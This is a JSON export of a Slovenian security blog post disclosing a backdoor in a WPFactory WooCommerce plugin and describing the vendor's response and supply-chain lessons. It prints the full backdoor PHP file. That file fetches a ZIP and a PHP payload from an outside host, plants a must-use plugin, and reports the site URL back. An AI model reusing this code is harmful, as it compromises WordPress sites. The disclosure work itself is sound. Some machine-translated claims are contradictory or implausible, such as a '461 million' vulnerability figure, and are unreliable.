{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/si\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Varnostna luknja na spletnem mestu WPFactory: ogro\u017eenih je 170.000 spletnih strani WordPress"},"content":{"rendered":"<p>WordPress ostaja najbolj raz\u0161irjen sistem za upravljanje vsebin na svetu, saj poganja ve\u010d kot 40 odstotkov vseh spletnih strani na internetu. Od spletnih strani malih podjetij in osebnih blogov do velikih podjetni\u0161kih platform in infrastrukture e-trgovine, CMS je postal hrbtenica sodobnega spleta. Njegova priljubljenost izhaja iz njegove prilagodljivosti, odprtega ekosistema in ogromnega \u0161tevila vti\u010dnikov, ki so na voljo za raz\u0161iritev njegove funkcionalnosti.<\/p>\n\n\n\n<p>Vendar je ta isti ekosistem postal tudi eden najve\u010djih varnostnih izzivov za WordPress.<\/p>\n\n\n\n<p>V podjetju Ferber Enterprises na\u0161a ekipa za kibernetsko varnost nenehno spremlja gro\u017enje, ki vplivajo na ekosistem WordPressa, saj se ranljivosti v vti\u010dnikih, predlogah ali dobavnih verigah lahko hitro razvijejo v obse\u017ene varnostne kr\u0161itve, ki prizadenejo tiso\u010de spletnih strani po vsem svetu. V zadnjih letih napadalci vse pogosteje ciljajo na razvijalce vti\u010dnikov in distribucijsko infrastrukturo namesto na posamezne spletne strani, kar omogo\u010da \u0161irjenje zlonamerne kode prek zaupanja vrednih posodobitev programske opreme in uradnih kanalov za prenos.<\/p>\n\n\n\n<p>Ta teden je izbruhnila velika polemika v zvezi s podjetjem WPFactory, znanim razvijalcem vti\u010dnikov za WordPress, katerega izdelki so name\u0161\u010deni na ve\u010d kot 170.000 spletnih straneh po vsem svetu. Ve\u010d kot 80 vti\u010dnikov, povezanih s tem podjetjem, je bilo za\u010dasno umaknjenih s spletne strani WordPress.org, potem ko je na\u0161a ekipa za kibernetsko varnost pri WPFactory odkrila sumljivo zadnja vrata v premium razli\u010dici enega od njihovih vti\u010dnikov.<\/p>\n\n\n\n<p>Incident je spro\u017eil resne pomisleke v skupnosti WordPress glede varnosti dobavne verige programske opreme, procesov pregledovanja vti\u010dnikov in vse ve\u010dje prefinjenosti napadov na ekosistem odprtokodnih re\u0161itev.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Odkritje sumljivega vedenja vti\u010dnika<\/h2>\n\n\n\n<p>Ta te\u017eava se je prvi\u010d pojavila, ko je na\u0161a ekipa za kibernetsko varnost pri Ferber Enterprises med testiranjem premium razli\u010dice vti\u010dnika \u00bbEU VAT for WooCommerce Pro\u00ab, ki se distribuira neposredno z njihove uradne spletne strani, opazila nenavadno delovanje.<\/p>\n\n\n\n<p>Sprva se je preiskava za\u010dela po tem, ko je vti\u010dnik med namestitvijo povzro\u010dil kriti\u010dno napako. Med odpravljanjem te\u017eave so na\u0161i analitiki identificirali sumotivo datoteko PHP z imenom class-alg-wc-eu-vat-customer.php. Zdelo se je, da datoteka izvaja vedenje, ki je popolnoma v neskladju s pri\u010dakovano funkcionalnostjo vti\u010dnika WooCommerce VAT.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . '\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>Po na\u0161i analizi je koda posku\u0161ala:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Prenesite zunanjo ZIP datoteko z oddaljenega stre\u017enika<\/li>\n\n\n\n<li>Spremeni imenike jedra WordPressa<\/li>\n\n\n\n<li>Komunicirajte z zunanjo infrastrukturo<\/li>\n\n\n\n<li>Potencialno izvajanje oddaljenih pla\u010dilnih kod na prizadetih spletnih mestih<\/li>\n<\/ul>\n\n\n\n<p>Ti kazalniki so takoj nakazali na mo\u017eno prisotnost skrite zadnje strani ali zlonamerne ogro\u017eenosti dobavne verige.<\/p>\n\n\n\n<p>Kar je situacijo naredilo \u0161e posebej zaskrbljujo\u010do, je bilo dejstvo, da vti\u010dnik ni bil pridobljen iz neuradnega ogledala ali piratskega repozitorija. Paket je bil prenesen neposredno z uradnega portala za stranke podjetja WPFactory, kar je \u0161e okrepilo sum, da je bil morda ogro\u017een sam distribucijski kanal.<\/p>\n\n\n\n<p>V podjetju Ferber Enterprises smo incident takoj dokumentirali in za\u010deli postopek odgovornega obve\u0161\u010danja, tako da smo se prek GitHuba neposredno obrnili na podjetje WPFactory.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">Prvi odziv s strani WPFactory<\/h2><\/div>\n\n\n\n<p>Podjetje WPFactory je sprva odgovorilo, da sumljiva datoteka in vedenje, opisana v poro\u010dilu, nista del njihove uradne kodne baze.<\/p>\n\n\n\n<p>Predstavnik podjetja je predlagal ve\u010d alternativnih razlag, vklju\u010dno z:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Modificirana lokalna namestitev<\/li>\n\n\n\n<li>Ogro\u017eeno spletno okolje<\/li>\n\n\n\n<li>Zastarela razli\u010dica vti\u010dnika<\/li>\n\n\n\n<li>Potencialno prirejen vir prenosa<\/li>\n<\/ul>\n\n\n\n<p>Dru\u017eba je prav tako navedla, da zaradi varnostnih razlogov ni mogla pregledati prilo\u017eene ZIP datoteke, ker je njihov brskalnik arhiv ozna\u010dil kot potencialno nevaren.<\/p>\n\n\n\n<p>Na\u0161a ekipa za kibernetsko varnost je nato pojasnila, da je bil vti\u010dnik prenesen neposredno z uradne spletne strani WPFactory in da je sumljiva datoteka ostala prisotna tudi po prenosu nove kopije razli\u010dice 4.6.1 iz istega vira.<\/p>\n\n\n\n<p>Ta podrobnost je postala osrednja to\u010dka preiskave. \u010ce je ve\u010d neodvisnih prenosov iz uradnega distribucijskega kanala dosledno vsebovalo isto sumljivo kodo, je mo\u017enost vdora v lokalno spletno stran postajala vse manj verjetna. Kljub tem ugotovitvam je podjetje WPFactory sprva navedlo, da te\u017eave na svoji strani ni uspelo ponoviti, in trdilo, da sumljiva datoteka v uradnem paketu vti\u010dnikov ne obstaja.<\/p>\n\n\n\n<p>Podjetje je nato zaprosilo za skrbni\u0161ki in FTP-dostop do prizadetega okolja, da bi lahko nadaljevalo preiskavo. V podjetju Ferber Enterprises smo to pro\u0161njo zavrnili zaradi varnostnih razlogov. Omogo\u010danje privilegiranega dostopa do stre\u017enika dobavitelju, katerega infrastruktura je morda sama ogro\u017eena, bi pomenilo nesprejemljivo varnostno tveganje. Na\u0161a ekipa je namesto tega nadaljevala z zagotavljanjem tehni\u010dnih dokazov, vklju\u010dno z videoposnetkom, ki prikazuje sumljivo delovanje vti\u010dnika takoj po namestitvi.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Stopnjevanje na WordPress.org<\/h2><\/div>\n\n\n\n<p>S potekom preiskave so se pove\u010dale skrbi glede morebitnega obsega problema. Podjetje WPFactory ponuja obse\u017een nabor vti\u010dnikov, ki obsega ve\u010d kot 65 vti\u010dnikov s skupno ve\u010d kot 170.000 aktivnimi namestitvami. Vsak vdor v distribucijsko infrastrukturo podjetja bi zato lahko imel daljnose\u017ene posledice za celoten ekosistem WordPressa.<\/p>\n\n\n\n<p>Na\u0161a ekipa je zadevo posredovala neposredno na WordPress.org, da bi prepre\u010dila, da bi med potekom preiskave \u0161e ve\u010d uporabnikov namestilo potencialno ogro\u017eene pakete. WordPress.org je nato sprejel izredni ukrep in za\u010dasno umaknil ve\u010d kot 80 vti\u010dnikov WPFactory iz uradnega repozitorija.<\/p>\n\n\n\n<p>Ta poteza je takoj pritegnila pozornost celotne varnostne skupnosti WordPressa, saj so mno\u017ei\u010dna zaprtja vti\u010dnikov tak\u0161nega obsega razmeroma redka in ponavadi ka\u017eejo na resne nere\u0161ene te\u017eave. Po eskalaciji je podjetje WPFactory kasneje priznalo, da se je te\u017eava izkazala za utemeljeno, in se opravi\u010dilo, da ni hitreje ukrepalo ob prvem poro\u010dilu. Predstavniki podjetja so izjavili, da zadevo aktivno preiskujejo in si prizadevajo za re\u0161itev. Ena od hipotez, ki jo je notranje postavilo podjetje WPFactory, je nakazovala, da je bil morda prek njihove infrastrukture nenamerno posredovan zastarel ali v predpomnilniku shranjen paket vti\u010dnikov.<\/p>\n\n\n\n<p>Vendar se je na\u0161a ekipa za kibernetsko varnost s to oceno strinjala. Opazovano vedenje je mo\u010dno nakazovalo na globljo varnostno te\u017eavo, ki bi lahko vklju\u010devala ogro\u017eene gradbene cevovode, distribucijske sisteme ali nepoobla\u0161\u010deno vna\u0161anje kode v arhive prenosnih vti\u010dnikov.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Zakaj je ta incident pomemben<\/h2>\n\n\n\n<p>Spor okoli WPFactory opozarja na vse ve\u010djo gro\u017enjo za kibernetsko varnost, znano kot napad na dobavno verigo programske opreme. V preteklosti so se napadalci osredoto\u010dali na neposredno ogro\u017eanje posameznih spletnih strani z napadi po metodi brute force ali z izkori\u0161\u010danjem ranljivosti vti\u010dnikov. Danes pa se napadalci vse pogosteje osredoto\u010dajo na same ponudnike programske opreme, saj ogro\u017eanje zaupanja vrednega dobavitelja omogo\u010da, da se zlonameren kod raz\u0161iri na tiso\u010de spletnih strani hkrati.<\/p>\n\n\n\n<p>To strategijo smo \u017ee opazili v ve\u010d odmevnih kibernetskih incidentih, ki so v zadnjem desetletju prizadeli globalne programske ekosisteme. Konkretno v ekosistemu WordPress predstavljajo razvijalci vti\u010dnikov privla\u010dne tar\u010de, ker skrbniki vti\u010dnikom po naravi zaupajo in ti pogosto delujejo z zvi\u0161animi dovoljenji.<\/p>\n\n\n\n<p>\u010ce se zlonameren kod vklju\u010di v paket vti\u010dnika, ki se distribuira prek uradnega kanala, lahko prizadete spletne strani nevede same namestijo zlonamerno programsko opremo. V primeru sumljivega vti\u010dnika WPFactory so mo\u017ene posledice resne.<\/p>\n\n\n\n<p>Na podlagi na\u0161e analize bi identificirano vedenje teoreti\u010dno omogo\u010dilo napadalcem, da:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Namesti dodatno zlonamerno programsko opremo<\/li>\n\n\n\n<li>Vstavite SEO spam<\/li>\n\n\n\n<li>Ustvarite trajne zlonamerne programe<\/li>\n\n\n\n<li>Prenesti ob\u010dutljive podatke<\/li>\n\n\n\n<li>Oddaljeno upravljanje namestitev WordPressa<\/li>\n\n\n\n<li>Vzdr\u017eevati nepoobla\u0161\u010den dostop dalj \u010dasa<\/li>\n<\/ul>\n\n\n\n<p>Nevarnost tak\u0161nih napadov ti\u010di v njihovi prikritosti. Sodobna zaledna vrata (backdoors) so pogosto zasnovana tako, da mirujejo mesece, preden se aktivirajo, kar znatno ote\u017euje njihovo odkrivanje. V za\u010detku tega meseca je bila skupina WordPress Plugins Team poro\u010dala, da je zaprla ve\u010d kot 30 vti\u010dnikov, potem ko je skrita zlonamerna koda, vdelana v drug portfelj vti\u010dnikov, ostala neaktivna pribli\u017eno osem mesecev, preden se je kon\u010dno aktivirala in na spletna mesta vbrizgala SEO spam.<\/p>\n\n\n\n<p>Ta trend ponazarja, kako napadalci vse bolj dajejo prednost vztrajnosti in zakasnjeni aktivaciji, da bi se izognili mehanizmom zaznavanja.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">\u0160ir\u0161a varnostna kriza v ekosistemu WordPress<\/h2><\/div>\n\n\n\n<p>Incident WPFactory razkriva tudi \u0161ir\u0161e sistemske varnostne izzive, ki vplivajo na WordPress kot celoto. Ekosistem vti\u010dnikov se je v zadnjem desetletju mo\u010dno raz\u0161iril, saj je na uradnih in komercialnih tr\u017enicah na voljo ve\u010d deset tiso\u010d vti\u010dnikov. \u010ceprav ta ekosistem spodbuja inovativnost in prilagodljivost, hkrati povzro\u010da tudi izjemno zapletenost pri nadzoru varnosti.<\/p>\n\n\n\n<p>Glede na poro\u010dilo podjetja Patchstack z naslovom \u201cStanje varnosti WordPressa v letu 2026\u201d skoraj 461 milijonov znanih ranljivosti ni bilo odpravljenih pred javnim razkritjem. Ta statistika odra\u017ea vse ve\u010djo obremenitev, s katero se soo\u010dajo razvijalci vti\u010dnikov, raziskovalci na podro\u010dju varnosti in skrbniki repozitorijev.<\/p>\n\n\n\n<p>Hkrati pa naj bi uradna vrsta WordPress vti\u010dnikov za pregled zdaj presegala 4.000 vti\u010dnikov, ki \u010dakajo na pregled. Tak\u0161ne \u0161tevilke ponazarjajo ogromen izziv zagotavljanja kakovosti in revizije varnosti v obsegu.<\/p>\n\n\n\n<p>Mnogi razvijalci vti\u010dnikov so majhne ekipe z omejenimi varnostnimi viri. Drugi pa hkrati upravljajo z ve\u010d desetimi vti\u010dniki, pri \u010demer izvajajo agresivne strategije poslovne rasti, ki vklju\u010dujejo prevzeme in \u0161iritev portfelja. Tudi podjetje WPFactory se je nedavno raz\u0161irilo s prevzemi, med katerimi je bil leta 2025 nakup podjetja Extend-WP in njegovih 19 vti\u010dnikov, \u010demur je \u0161e istega leta sledil prevzem podjetja WBW in ve\u010d dodatnih vti\u010dnikov.<\/p>\n\n\n\n<p>Hitro \u0161irjenje portfelja lahko ustvari operativno kompleksnost, ki zaplete revizijo kode, upravljanje infrastrukture in preverjanje celovitosti izdaje. Napadalci se teh resni\u010dnosti dobro zavedajo. Vedno bolj se osredoto\u010dajo na izkori\u0161\u010danje \u0161ibkih praks operativne varnosti pri ponudnikih programske opreme, namesto da bi neposredno ciljali na kon\u010dne uporabnike.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Nara\u0161\u010dajo\u010di pomen varnosti dobavne verige<\/h2>\n\n\n\n<p>Dogodki, kot je ta, krepijo nujno potrebo po stro\u017ejih praksah varnosti dobavne verige v celotnem ekosistemu WordPress.<\/p>\n\n\n\n<p>V podjetju Ferber Enterprises na\u0161a ekipa za kibernetsko varnost odlo\u010dno priporo\u010da, da razvijalci vti\u010dnikov uvedejo nekaj klju\u010dnih varnostnih ukrepov, med drugim:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kriptografsko podpisovanje paketov<\/li>\n\n\n\n<li>Varni CI\/CD cevovodi<\/li>\n\n\n\n<li>Obvezna ve\u010dfaktorska avtentikacija<\/li>\n\n\n\n<li>Segmentacija infrastrukture<\/li>\n\n\n\n<li>Neprekinjeno spremljanje celovitosti<\/li>\n\n\n\n<li>Neodvisne kode revizije<\/li>\n\n\n\n<li>Ponovljivi gradbeni sistemi<\/li>\n<\/ul>\n\n\n\n<p>Skrbniki spletnih strani bi morali okrepiti tudi lastno varnost. Tudi vti\u010dnikov, prenesenih iz uradnih ali zaupanja vrednih virov, ne gre domnevati, da so nujno varni.<\/p>\n\n\n\n<p>Organizacije, ki upravljajo kriti\u010dno infrastrukturo WordPress, bi morale razmisliti o:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Vzdr\u017eevanje uprizoritvenih okolij<\/li>\n\n\n\n<li>Nadzor izhodnega prometa<\/li>\n\n\n\n<li>Skeniranje vti\u010dnikov pred uvajanjem<\/li>\n\n\n\n<li>Omejevanje uporabe vti\u010dnikov<\/li>\n\n\n\n<li>Uporaba nadzora dostopa z najmanj\u0161imi pooblastili<\/li>\n\n\n\n<li>Uvajanje spremljanja celovitosti datotek<\/li>\n\n\n\n<li>Uporaba upravljanih po\u017earnih zidov za spletne aplikacije (WAF)<\/li>\n<\/ul>\n\n\n\n<p>V podjetni\u0161kih okoljih postaja preverjanje dobavne verige enako pomembno kot tradicionalno obvladovanje ranljivosti. Predpostavka, da so uradni programski kanali vedno varni, v dana\u0161njem okolju gro\u017eenj ni ve\u010d realna.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Odzivi skupnosti in nadaljevanje preiskave<\/h2>\n\n\n\n<p>Spor se je hitro raz\u0161iril po skupnosti WordPress, ko so razvijalci, varnostni raziskovalci in ponudniki infrastrukture javno za\u010deli razpravljati o tej zadevi.<\/p>\n\n\n\n<p>Ve\u010d znanih osebnosti v ekosistemu je pove\u010dalo ozave\u0161\u010denost o situaciji, vklju\u010dno z razvijalci, ki so objavili sezname za\u010dasno zaprtih vti\u010dnikov in skrbnike spodbudili k reviziji svojih okolij.<\/p>\n\n\n\n<p>Medtem na\u0161a ekipa pri Ferber Enterprises nadaljuje z analizo sumljivih vzorcev vti\u010dnikov in spremlja morebitne dodatne znake vdora, ki bi lahko ogrozili spletne strani WordPress po vsem svetu.<\/p>\n\n\n\n<p>Ob objavi je podjetje WPFactory potrdilo obstoj te\u017eave in navedlo, da si aktivno prizadeva za njeno re\u0161itev.<\/p>\n\n\n\n<p>Vendar \u0161tevilna vpra\u0161anja ostajajo neodgovorjena:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Je bila uradna distribucijska infrastruktura ogro\u017eena?<\/li>\n\n\n\n<li>Kako dolgo so bili zlonamerni paketi potencialno distribuirani?<\/li>\n\n\n\n<li>So bili prizadeti dodatni vti\u010dniki?<\/li>\n\n\n\n<li>Je bila vdrta uporabni\u0161ka ra\u010duna ali preneseni sistemi?<\/li>\n\n\n\n<li>Ali so napadalci pridobili trajen dostop do interne infrastrukture?<\/li>\n\n\n\n<li>Ali bi lahko obstajala dodatna nedejavna tovorna bremena?<\/li>\n<\/ul>\n\n\n\n<p>Dokler ta vpra\u0161anja ne bodo v celoti re\u0161ena, previdnost ostaja klju\u010dnega pomena.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Prihodnost varnosti WordPressa<\/h2>\n\n\n\n<p>Incident WPFactory bi lahko na koncu postal \u0161e en zna\u010dilen primer izzivov na podro\u010dju kibernetske varnosti, s katerimi se soo\u010da odprtokodni spletni ekosistem.<\/p>\n\n\n\n<p>WordPress poganja ogromen del globalnega spletnega gospodarstva. Kakr\u0161no koli obse\u017eno ogro\u017eanje, ki bi prizadelo razvijalce vti\u010dnikov, ima zato lahko posledice, ki segajo dale\u010d za posamezna spletna mesta.<\/p>\n\n\n\n<p>Ker se napadalci vse bolj usmerjajo v ogro\u017eanje dobavne verige in tehnike prikritega trajnega prisotnosti, varnosti vti\u010dnikov ni ve\u010d mogo\u010de obravnavati kot drugotno vpra\u0161anje. V podjetju Ferber Enterprises menimo, da je ta dogodek pomemben opomin, da kibernetska varnost ne zajema le za\u0161\u010dite samih spletnih strani, temve\u010d tudi za\u0161\u010dito vseh ravni verige distribucije programske opreme.<\/p>\n\n\n\n<p>Zaupanje v odprte ekosisteme je odvisno od preglednosti, hitrega odzivanja na incident in mo\u010dnih praks operativne varnosti. Ekosistem WordPress je zdaj na pomembni to\u010dki.<\/p>\n\n\n\n<p>Kako se bodo razvijalci, vzdr\u017eevalci repozitorijev, ponudniki gostovanja in varnostne ekipe odzvali na tak\u0161ne incidente, bo pomagalo dolo\u010diti, ali lahko WordPress \u0161e naprej ohrani zaupanje milijonov podjetij in organizacij, ki se vsak dan zana\u0161ajo nanj.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeline\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"r